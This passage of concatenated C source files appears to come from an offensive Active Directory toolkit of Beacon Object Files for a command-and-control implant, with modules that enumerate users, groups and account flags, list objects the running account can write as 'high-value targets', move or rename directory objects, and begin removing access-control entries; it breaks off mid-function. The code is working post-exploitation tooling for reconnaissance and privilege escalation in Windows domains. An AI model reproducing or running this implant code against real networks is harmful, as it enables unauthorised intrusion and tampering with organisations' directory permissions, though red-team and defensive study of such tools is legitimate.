            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Query UAC attribute
    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "userAccountControl", NULL };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        targetDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query UAC");
        PrintLdapError("Query UAC", result);
        MSVCRT$free(targetDN);
        if (defaultNC) MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        char** values = WLDAP32$ldap_get_values(ld, entry, "userAccountControl");
        if (values && values[0]) {
            DWORD uacValue = (DWORD)MSVCRT$strtol(values[0], NULL, 10);
            PrintUACFlags(uacValue);
            WLDAP32$ldap_value_free(values);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] No userAccountControl attribute found");
        }
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-usergroups.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: user_identifier, is_dn, search_ou, dc_address, use_ldaps
    char* userIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isUserDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!userIdentifier || MSVCRT$strlen(userIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] User identifier is required");
        return;
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Resolve user DN
    char* userDN = NULL;
    if (isUserDN) {
        size_t len = MSVCRT$strlen(userIdentifier) + 1;
        userDN = (char*)MSVCRT$malloc(len);
        if (userDN) {
            MSVCRT$strcpy(userDN, userIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        userDN = FindObjectDN(ld, userIdentifier, searchBase);
        if (!userDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] User '%s' not found", userIdentifier);
            MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] User DN: %s", userDN);
    }

    // Query the user's memberOf attribute
    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "memberOf", NULL };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        userDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query user groups");
        PrintLdapError("Query memberOf", result);
        MSVCRT$free(userDN);
        MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        char** memberOfValues = WLDAP32$ldap_get_values(ld, entry, "memberOf");
        if (memberOfValues) {
            int groupCount = WLDAP32$ldap_count_values(memberOfValues);
            BeaconPrintf(CALLBACK_OUTPUT, "[+] User is member of %d group(s):\n", groupCount);
            BeaconPrintf(CALLBACK_OUTPUT, "Group DN");
            BeaconPrintf(CALLBACK_OUTPUT, "========");
            for (int i = 0; memberOfValues[i] != NULL; i++) {
                BeaconPrintf(CALLBACK_OUTPUT, "%s", memberOfValues[i]);
            }
            WLDAP32$ldap_value_free(memberOfValues);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] User is not a member of any groups (or only primary group)");
        }
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(userDN);
    MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-users.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: search_ou, dc_address, use_ldaps, attributes
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    char* attributesStr = ValidateInput(BeaconDataExtract(&parser, NULL));

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;

    // Build attribute list
    char* attrs[64];
    char* defaultAttrs[] = { "distinguishedName" };
    int attrCount = BuildAttributeList(attributesStr, defaultAttrs, 1, attrs, 64);

    // Check if ntSecurityDescriptor is requested (case-insensitive)
    BOOL needSDFlags = FALSE;
    for (int i = 0; i < attrCount; i++) {
        if (MSVCRT$_stricmp(attrs[i], "ntSecurityDescriptor") == 0) {
            needSDFlags = TRUE;
            break;
        }
    }

    // Search for user objects
    LDAPMessage* searchResult = NULL;
    ULONG result;

    if (needSDFlags) {
        // Create SD_FLAGS control for ntSecurityDescriptor
        DWORD sdFlags = OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION;

        char sdFlagsBuffer[10];
        struct berval sdFlagsValue;
        LDAPControlA* sdFlagsControl = BuildSDFlagsControl(sdFlags, sdFlagsBuffer, &sdFlagsValue);

        LDAPControlA* serverControls[] = { sdFlagsControl, NULL };

        result = WLDAP32$ldap_search_ext_s(
            ld,
            searchBase,
            LDAP_SCOPE_SUBTREE,
            "(&(objectClass=user)(objectCategory=person))",
            attrs,
            0,
            serverControls,
            NULL,           // ClientControls
            NULL,           // timeout
            0,              // SizeLimit
            &searchResult
        );
    } else {
        result = WLDAP32$ldap_search_s(
            ld,
            searchBase,
            LDAP_SCOPE_SUBTREE,
            "(&(objectClass=user)(objectCategory=person))",
            attrs,
            0,
            &searchResult
        );
    }

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to search for users");
        PrintLdapError("Search users", result);
        MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    int userCount = WLDAP32$ldap_count_entries(ld, searchResult);
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Found %d user(s):\n", userCount);

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    while (entry != NULL) {
        BeaconPrintf(CALLBACK_OUTPUT, "===================================");

        // Display all requested attributes
        for (int i = 0; i < attrCount; i++) {
            DisplayAttributeValue(ld, entry, attrs[i]);
        }

        entry = WLDAP32$ldap_next_entry(ld, entry);
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-writable.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: search_ou, dc_address, use_ldaps, detailed
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    int detailed = BeaconDataInt(&parser);

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;

    // Search for objects - we'll check each one for write access
    // Focus on high-value targets: users, computers, groups
    LDAPMessage* searchResult = NULL;
    char* attrs[] = { 
        "distinguishedName", 
        "objectClass",
        "allowedAttributesEffective",  // This shows what the current user can write
        "allowedChildClassesEffective", // This shows what child objects can be created
        NULL 
    };

    // Search for users and computers (objectCategory=person catches users)
    char* filter = "(|(objectClass=user)(objectClass=computer)(objectClass=group)(objectClass=organizationalUnit))";

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        searchBase,
        LDAP_SCOPE_SUBTREE,
        filter,
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to search for objects");
        PrintLdapError("Search objects", result);
        MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    int totalCount = WLDAP32$ldap_count_entries(ld, searchResult);
    int writableCount = 0;

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    while (entry != NULL) {
        char** dnValues = WLDAP32$ldap_get_values(ld, entry, "distinguishedName");
        char** effectiveAttrs = WLDAP32$ldap_get_values(ld, entry, "allowedAttributesEffective");
        char** childClasses = WLDAP32$ldap_get_values(ld, entry, "allowedChildClassesEffective");

        BOOL hasWritePerms = (effectiveAttrs && effectiveAttrs[0]);
        BOOL hasCreateChild = (childClasses && childClasses[0]);
        
        // If the object has writable attributes OR createChild permissions, it's interesting
        if (hasWritePerms || hasCreateChild) {
            writableCount++;
            
            if (detailed) {
                // Show DN
                if (dnValues && dnValues[0]) {
                    BeaconPrintf(CALLBACK_OUTPUT, "distinguishedName: %s", dnValues[0]);
                }
                
                // Show all writable attributes
                if (hasWritePerms) {
                    int i = 0;
                    while (effectiveAttrs[i] != NULL) {
                        BeaconPrintf(CALLBACK_OUTPUT, "%s: WRITE", effectiveAttrs[i]);
                        i++;
                    }
                }
                
                // Show all creatable child classes
                if (hasCreateChild) {
                    int i = 0;
                    while (childClasses[i] != NULL) {
                        BeaconPrintf(CALLBACK_OUTPUT, "%s: CREATE_CHILD", childClasses[i]);
                        i++;
                    }
                }
                
                BeaconPrintf(CALLBACK_OUTPUT, "\n");  // Blank line between objects
            } else {
                // Just show DN and permission type(s)
                if (dnValues && dnValues[0]) {
                    BeaconPrintf(CALLBACK_OUTPUT, "distinguishedName: %s", dnValues[0]);
                    
                    // Show which permission types apply
                    if (hasWritePerms && hasCreateChild) {
                        BeaconPrintf(CALLBACK_OUTPUT, "permission: WRITE, CREATE_CHILD");
                    } else if (hasWritePerms) {
                        BeaconPrintf(CALLBACK_OUTPUT, "permission: WRITE");
                    } else if (hasCreateChild) {
                        BeaconPrintf(CALLBACK_OUTPUT, "permission: CREATE_CHILD");
                    }
                    
                    BeaconPrintf(CALLBACK_OUTPUT, "\n");  // Blank line between objects
                }
            }
        }
        
        if (dnValues) WLDAP32$ldap_value_free(dnValues);
        if (effectiveAttrs) WLDAP32$ldap_value_free(effectiveAttrs);
        if (childClasses) WLDAP32$ldap_value_free(childClasses);
        entry = WLDAP32$ldap_next_entry(ld, entry);
    }
    
    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(defaultNC);
    MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Found %d objects with write permissions", writableCount);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/move/move-object.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

DECLSPEC_IMPORT ULONG WLDAP32$ldap_rename_ext_s(
    LDAP* ld, 
    PCHAR dn, 
    PCHAR newrdn, 
    PCHAR newparent, 
    int deleteoldrdn,
    PLDAPControlA* ServerControls,
    PLDAPControlA* ClientControls
);

// Extract RDN from a full DN
// Returns a newly allocated string with just the "CN=Something" part
char* ExtractRDN(const char* dn) {
    if (!dn || MSVCRT$strlen(dn) == 0) return NULL;
    
    // Find the first comma (end of RDN)
    const char* comma = MSVCRT$strstr(dn, ",");
    
    if (!comma) {
        // No comma found - the entire thing is the RDN
        size_t len = MSVCRT$strlen(dn) + 1;
        char* rdn = (char*)MSVCRT$malloc(len);
        if (rdn) {
            MSVCRT$strcpy(rdn, dn);
        }
        return rdn;
    }
    
    // Extract everything before the comma
    size_t rdnLen = comma - dn;
    char* rdn = (char*)MSVCRT$malloc(rdnLen + 1);
    if (rdn) {
        MSVCRT$memcpy(rdn, dn, rdnLen);
        rdn[rdnLen] = '\0';
    }
    
    return rdn;
}

// Extract parent DN from a full DN
// Returns a newly allocated string with everything after the first comma
char* ExtractParentDN(const char* dn) {
    if (!dn || MSVCRT$strlen(dn) == 0) return NULL;
    
    // Find the first comma
    const char* comma = MSVCRT$strstr(dn, ",");
    
    if (!comma || *(comma + 1) == '\0') {
        // No parent (or comma at end)
        return NULL;
    }
    
    // Skip the comma and extract the rest
    comma++; // Move past the comma
    size_t parentLen = MSVCRT$strlen(comma) + 1;
    char* parent = (char*)MSVCRT$malloc(parentLen);
    if (parent) {
        MSVCRT$strcpy(parent, comma);
    }
    
    return parent;
}

// Extract the CN value from an RDN (without the "CN=" prefix)
// E.g., "CN=User Name" -> "User Name"
char* ExtractCNValue(const char* rdn) {
    if (!rdn || MSVCRT$strlen(rdn) < 4) return NULL;
    
    // Check if it starts with "CN="
    if (MSVCRT$strncmp(rdn, "CN=", 3) != 0) {
        // Not a CN-based RDN, return as-is
        size_t len = MSVCRT$strlen(rdn) + 1;
        char* value = (char*)MSVCRT$malloc(len);
        if (value) {
            MSVCRT$strcpy(value, rdn);
        }
        return value;
    }
    
    // Skip "CN=" and return the rest
    const char* value = rdn + 3;
    size_t len = MSVCRT$strlen(value) + 1;
    char* result = (char*)MSVCRT$malloc(len);
    if (result) {
        MSVCRT$strcpy(result, value);
    }
    
    return result;
}

// Build a new full DN from RDN and parent
char* BuildFullDN(const char* rdn, const char* parentDN) {
    if (!rdn) return NULL;
    
    size_t totalLen = MSVCRT$strlen(rdn) + 1; // RDN + null terminator
    
    if (parentDN && MSVCRT$strlen(parentDN) > 0) {
        totalLen += 1 + MSVCRT$strlen(parentDN); // comma + parent DN
    }
    
    char* fullDN = (char*)MSVCRT$malloc(totalLen);
    if (!fullDN) return NULL;
    
    MSVCRT$strcpy(fullDN, rdn);
    
    if (parentDN && MSVCRT$strlen(parentDN) > 0) {
        MSVCRT$strcat(fullDN, ",");
        MSVCRT$strcat(fullDN, parentDN);
    }
    
    return fullDN;
}

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments: source_identifier, is_source_dn, target_ou, new_name,
    // search_ou, dc_address, use_ldaps
    char* sourceIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isSourceDN = BeaconDataInt(&parser);
    char* targetOU = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* newName = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    // Validate required parameters
    if (!sourceIdentifier || MSVCRT$strlen(sourceIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Source object identifier is required");
        return;
    }
    
    // Must have at least one operation: move OR rename
    if ((!targetOU || MSVCRT$strlen(targetOU) == 0) && 
        (!newName || MSVCRT$strlen(newName) == 0)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Must specify target OU and/or new name");
        return;
    }
    
    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }
    
    // Get default naming context (needed for searches if DN not provided)
    char* defaultNC = NULL;
    char* sourceDN = NULL;
    
    if (!isSourceDN) {
        
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }
    
    // Resolve source DN
    if (isSourceDN) {
        // Source identifier is already a DN
        size_t len = MSVCRT$strlen(sourceIdentifier) + 1;
        sourceDN = (char*)MSVCRT$malloc(len);
        if (sourceDN) {
            MSVCRT$strcpy(sourceDN, sourceIdentifier);
        }
    } else {
        // Search for source by sAMAccountName
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        sourceDN = FindObjectDN(ld, sourceIdentifier, searchBase);
        
        if (!sourceDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve source DN");
            BeaconPrintf(CALLBACK_ERROR, "[!] Object '%s' not found", sourceIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            CleanupLDAP(ld);
            return;
        }
    }
    
    // Extract current RDN and parent from source DN
    char* currentRDN = ExtractRDN(sourceDN);
    char* currentParent = ExtractParentDN(sourceDN);
    
    if (!currentRDN) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse source DN");
        if (defaultNC) MSVCRT$free(defaultNC);
        if (sourceDN) MSVCRT$free(sourceDN);
        CleanupLDAP(ld);
        return;
    }
    
    // Determine new RDN
    char* newRDN = NULL;
    if (newName && MSVCRT$strlen(newName) > 0) {
        // User specified a new name
        // Check if it already has a prefix (CN=, OU=, etc.)
        if (MSVCRT$strstr(newName, "=")) {
            // Already has a prefix, use as-is
            size_t len = MSVCRT$strlen(newName) + 1;
            newRDN = (char*)MSVCRT$malloc(len);
            if (newRDN) {
                MSVCRT$strcpy(newRDN, newName);
            }
        } else {
            // No prefix, add "CN="
            size_t len = 3 + MSVCRT$strlen(newName) + 1;
            newRDN = (char*)MSVCRT$malloc(len);
            if (newRDN) {
                MSVCRT$_snprintf(newRDN, len, "CN=%s", newName);
            }
        }
    } else {
        // No rename, use current RDN
        size_t len = MSVCRT$strlen(currentRDN) + 1;
        newRDN = (char*)MSVCRT$malloc(len);
        if (newRDN) {
            MSVCRT$strcpy(newRDN, currentRDN);
        }
    }
    
    // Determine new parent
    char* newParent = NULL;
    if (targetOU && MSVCRT$strlen(targetOU) > 0) {
        // User specified a target OU
        size_t len = MSVCRT$strlen(targetOU) + 1;
        newParent = (char*)MSVCRT$malloc(len);
        if (newParent) {
            MSVCRT$strcpy(newParent, targetOU);
        }
    } else {
        // No move, use current parent
        if (currentParent) {
            size_t len = MSVCRT$strlen(currentParent) + 1;
            newParent = (char*)MSVCRT$malloc(len);
            if (newParent) {
                MSVCRT$strcpy(newParent, currentParent);
            }
        }
    }
    
    // Build expected new full DN for display
    char* expectedNewDN = BuildFullDN(newRDN, newParent);
    
    // Determine what operation we're doing
    BOOL isMove = FALSE;
    BOOL isRename = FALSE;
    
    if (targetOU && MSVCRT$strlen(targetOU) > 0) {
        // Check if we're actually changing the parent
        if (!currentParent || MSVCRT$strcmp(currentParent, targetOU) != 0) {
            isMove = TRUE;
        }
    }
    
    if (newName && MSVCRT$strlen(newName) > 0) {
        // Check if we're actually changing the RDN
        if (MSVCRT$strcmp(currentRDN, newRDN) != 0) {
            isRename = TRUE;
        }
    }
    
    if (!isMove && !isRename) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] No changes detected - object already at target location with target name");
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Current DN: %s", sourceDN);
        goto cleanup;
    }
    
    // Perform the rename/move operation
    // Using ldap_rename_ext_s (the actual function exported by wldap32.dll)
    // Parameters: ld, current DN, new RDN, new parent, deleteoldrdn (1 = yes), 
    //             ServerControls (NULL), ClientControls (NULL)
    ULONG result = WLDAP32$ldap_rename_ext_s(
        ld,
        sourceDN,
        newRDN,
        newParent,
        1,      // deleteoldrdn: 1 = delete old RDN value, 0 = keep it
        NULL,   // ServerControls
        NULL    // ClientControls
    );
    
    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[+] Successfully completed operation!");
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Old DN: %s", sourceDN);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] New DN: %s", expectedNewDN ? expectedNewDN : "(unable to construct)");
        
        if (isMove && isRename) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Object moved and renamed successfully");
            
            // Extract the CN value for display
            char* oldName = ExtractCNValue(currentRDN);
            char* newNameValue = ExtractCNValue(newRDN);
            if (oldName && newNameValue) {
                BeaconPrintf(CALLBACK_OUTPUT, "[+]   Name: %s -> %s", oldName, newNameValue);
            }
            if (oldName) MSVCRT$free(oldName);
            if (newNameValue) MSVCRT$free(newNameValue);
            
            if (currentParent && newParent) {
                BeaconPrintf(CALLBACK_OUTPUT, "[+]   Location: %s -> %s", currentParent, newParent);
            }
        } else if (isMove) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Object moved successfully");
            if (currentParent && newParent) {
                BeaconPrintf(CALLBACK_OUTPUT, "[+]   From: %s", currentParent);
                BeaconPrintf(CALLBACK_OUTPUT, "[+]   To:   %s", newParent);
            }
        } else if (isRename) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Object renamed successfully");
            char* oldName = ExtractCNValue(currentRDN);
            char* newNameValue = ExtractCNValue(newRDN);
            if (oldName && newNameValue) {
                BeaconPrintf(CALLBACK_OUTPUT, "[+]   Old name: %s", oldName);
                BeaconPrintf(CALLBACK_OUTPUT, "[+]   New name: %s", newNameValue);
            }
            if (oldName) MSVCRT$free(oldName);
            if (newNameValue) MSVCRT$free(newNameValue);
        }
        
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to move/rename object");
        PrintLdapError("Move/rename object", result);
        BeaconPrintf(CALLBACK_OUTPUT, "");
        
        // Provide specific error guidance
        if (result == LDAP_NO_SUCH_OBJECT) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Target OU does not exist");
            if (newParent) {
                BeaconPrintf(CALLBACK_ERROR, "[!] Verify OU path: %s", newParent);
            }
        } else if (result == LDAP_ALREADY_EXISTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] An object with that name already exists in the target location");
            if (expectedNewDN) {
                BeaconPrintf(CALLBACK_ERROR, "[!] Conflicting DN: %s", expectedNewDN);
            }
        } else if (result == LDAP_INSUFFICIENT_RIGHTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Insufficient permissions to move/rename object");
            BeaconPrintf(CALLBACK_ERROR, "[!] Required permissions:");
            BeaconPrintf(CALLBACK_ERROR, "[!]   - Delete permission on source object");
            BeaconPrintf(CALLBACK_ERROR, "[!]   - Create child permission on target OU");
        } else if (result == LDAP_INVALID_DN_SYNTAX) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Invalid DN syntax in target OU");
            if (newParent) {
                BeaconPrintf(CALLBACK_ERROR, "[!] Check DN format: %s", newParent);
            }
        } else if (result == LDAP_OPERATIONS_ERROR) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Operation not permitted");
            BeaconPrintf(CALLBACK_ERROR, "[!] Possible causes:");
            BeaconPrintf(CALLBACK_ERROR, "[!]   - Trying to move critical system object");
            BeaconPrintf(CALLBACK_ERROR, "[!]   - Target OU has restrictions");
            BeaconPrintf(CALLBACK_ERROR, "[!]   - Object is part of infrastructure");
        } else if (result == LDAP_CONSTRAINT_VIOLATION) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Constraint violation");
            BeaconPrintf(CALLBACK_ERROR, "[!] Possible causes:");
            BeaconPrintf(CALLBACK_ERROR, "[!]   - Object has child objects (can't move containers with children)");
            BeaconPrintf(CALLBACK_ERROR, "[!]   - Target OU doesn't accept this object type");
            BeaconPrintf(CALLBACK_ERROR, "[!]   - Domain controller can't complete cross-domain move");
        }
    }
    
cleanup:
    // Cleanup
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    if (sourceDN) MSVCRT$free(sourceDN);
    if (currentRDN) MSVCRT$free(currentRDN);
    if (currentParent) MSVCRT$free(currentParent);
    if (newRDN) MSVCRT$free(newRDN);
    if (newParent) MSVCRT$free(newParent);
    if (expectedNewDN) MSVCRT$free(expectedNewDN);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/remove/remove-ace.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"
#include "acl_common.c"

DECLSPEC_IMPORT int __cdecl MSVCRT$memcmp(const void* buffer1, const void* buffer2, size_t count);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void* dest, int c, size_t count);

// Helper function to compare GUIDs
BOOL AreGuidsEqual(GUID* guid1, GUID* guid2) {
    if (!guid1 || !guid2) return FALSE;
    return (MSVCRT$memcmp(guid1, guid2, sizeof(GUID)) == 0);
}

// Helper function to check if an access mask represents an expanded generic right
// Windows expands generic rights to specific rights when writing to AD
BOOL IsExpandedGenericRight(ACCESS_MASK aceMask, ACCESS_MASK genericRight) {
    // Define expanded forms for each generic right in Active Directory
    
    // GENERIC_ALL (0x10000000) expands to:
    // DELETE | WRITE_DACL | WRITE_OWNER | READ_CONTROL | 
    // CREATE_CHILD | DELETE_CHILD | READ_PROP | WRITE_PROP | EXTENDED_RIGHT
    const ACCESS_MASK EXPANDED_GENERIC_ALL = 0x000F0133;
    const ACCESS_MASK EXPANDED_GENERIC_ALL_ALT = 0x000F01FF;  // Some variations
    const ACCESS_MASK GENERIC_ALL_CORE_RIGHTS = 
        DELETE_ACCESS |                 // 0x00010000
        WRITE_DACL |                    // 0x00040000
        WRITE_OWNER |                   // 0x00080000
        READ_CONTROL |                  // 0x00020000
        ADS_RIGHT_DS_CREATE_CHILD |     // 0x00000001
        ADS_RIGHT_DS_DELETE_CHILD |     // 0x00000002
        ADS_RIGHT_DS_READ_PROP |        // 0x00000010
        ADS_RIGHT_DS_WRITE_PROP |       // 0x00000020
        ADS_RIGHT_DS_CONTROL_ACCESS;    // 0x00000100
    
    // GENERIC_WRITE (0x40000000) expands to:
    // READ_CONTROL | WRITE_PROP | SELF
    const ACCESS_MASK EXPANDED_GENERIC_WRITE = 0x00020028;
    const ACCESS_MASK GENERIC_WRITE_CORE_RIGHTS = 
        READ_CONTROL |              // 0x00020000
        ADS_RIGHT_DS_WRITE_PROP |   // 0x00000020
        ADS_RIGHT_DS_SELF;          // 0x00000008
    
    // GENERIC_READ (0x80000000) expands to:
    // READ_CONTROL | LIST_CHILDREN | READ_PROP | LIST_OBJECT
    const ACCESS_MASK EXPANDED_GENERIC_READ = 0x00020094;
    const ACCESS_MASK GENERIC_READ_CORE_RIGHTS = 
        READ_CONTROL |              // 0x00020000
        ADS_RIGHT_ACTRL_DS_LIST |   // 0x00000004
        ADS_RIGHT_DS_READ_PROP |    // 0x00000010
        ADS_RIGHT_DS_LIST_OBJECT;   // 0x00000080
    
    // GENERIC_EXECUTE (0x20000000) expands to:
    // READ_CONTROL | LIST_CHILDREN
    const ACCESS_MASK EXPANDED_GENERIC_EXECUTE = 0x00020004;
    const ACCESS_MASK GENERIC_EXECUTE_CORE_RIGHTS = 
        READ_CONTROL |              // 0x00020000
        ADS_RIGHT_ACTRL_DS_LIST;    // 0x00000004
    
    // Check which generic right we're looking for
    if (genericRight == GENERIC_ALL) {
        // Check exact matches
        if (aceMask == EXPANDED_GENERIC_ALL || aceMask == EXPANDED_GENERIC_ALL_ALT) {
            return TRUE;
        }
        // Check if mask contains all core rights
        if ((aceMask & GENERIC_ALL_CORE_RIGHTS) == GENERIC_ALL_CORE_RIGHTS) {
            return TRUE;
        }
    }
    else if (genericRight == GENERIC_WRITE) {
        // Check exact match
        if (aceMask == EXPANDED_GENERIC_WRITE) {
            return TRUE;
        }
        // Check if mask contains all core rights
        if ((aceMask & GENERIC_WRITE_CORE_RIGHTS) == GENERIC_WRITE_CORE_RIGHTS) {
            return TRUE;
        }
    }
    else if (genericRight == GENERIC_READ) {
        // Check exact match
        if (aceMask == EXPANDED_GENERIC_READ) {
            return TRUE;
        }
        // Check if mask contains all core rights
        if ((aceMask & GENERIC_READ_CORE_RIGHTS) == GENERIC_READ_CORE_RIGHTS) {
            return TRUE;
        }
    }
    else if (genericRight == GENERIC_EXECUTE) {
        // Check exact match
